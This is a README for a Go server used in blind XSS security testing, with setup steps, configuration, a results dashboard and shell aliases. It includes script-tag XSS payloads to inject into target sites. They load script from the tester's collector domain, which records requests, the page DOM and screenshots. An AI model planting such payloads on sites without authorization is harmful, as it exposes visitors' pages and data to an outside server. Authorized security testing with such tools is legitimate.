Golang server for testing blind XSS.
Special endpoint for testing requests and file extensions.
- Install
git clone https://github.com/pichik/webwatcher
- Build application
sudo go build -o /usr/local/bin/webwatcher webwatcher/main.go
- Set permissions for ports
sudo setcap CAP_NET_BIND_SERVICE+ep ~/go/bin/webwatcher
- Fill
.wwconfigand add it to your home directory. - Move web directory to a place specified in config.
- Remove the rest.
All files in assets/ are publicly accessible.
If you are running https, directory with certificates should be generated.
!! Change domain in bait.js to your domain name !!
Login to your website with /login?token=[token]
After authentication, you can find all requests in /results/all.
Left side is from XSS requests.
Right side is from custom path requests.
This endpoint will contain response specified in assets/extensions.json file
"js": {
"Extension": [".js", ".mjs"],
"Content-Type": "application/javascript",
"Payload": "alert(document.domain)"
}
Insert this payload to the website, alert will popup.
<script src=https://domain.com/pichik.js></script>
This endpoint use regex pichik.* so you can use pichik-anything/after/counts.html
You can use any endpoint for testing blind XSS, but dont use your collector path for this, as it have priority, so no blind XSS payload will be send.
Detailed report will be created, with DOM and Screenshot.
These request will be sent to slack, if specified in config.
<script src=https://domain.com></script>
Useful linux aliases
alias webstep='sudo mv ~/main /usr/local/bin/ww'
alias webstep2='sudo setcap CAP_NET_BIND_SERVICE+ep /usr/local/bin/ww'
alias wwinstal='webstep && webstep2; echo "Web watcher installed"'
alias wwstart='nohup ww >/dev/null 2>&1 & echo "Web watcher started"'
alias wwstop='pkill ww; echo "Web watcher stopped"'
alias wwrestart='wwstop;wwstart; echo "Web watcher restarted"'
alias wwdebug='tail -f ~/web/logs/debug.txt'
alias wwlog='tail -f ~/web/logs/requests.txt'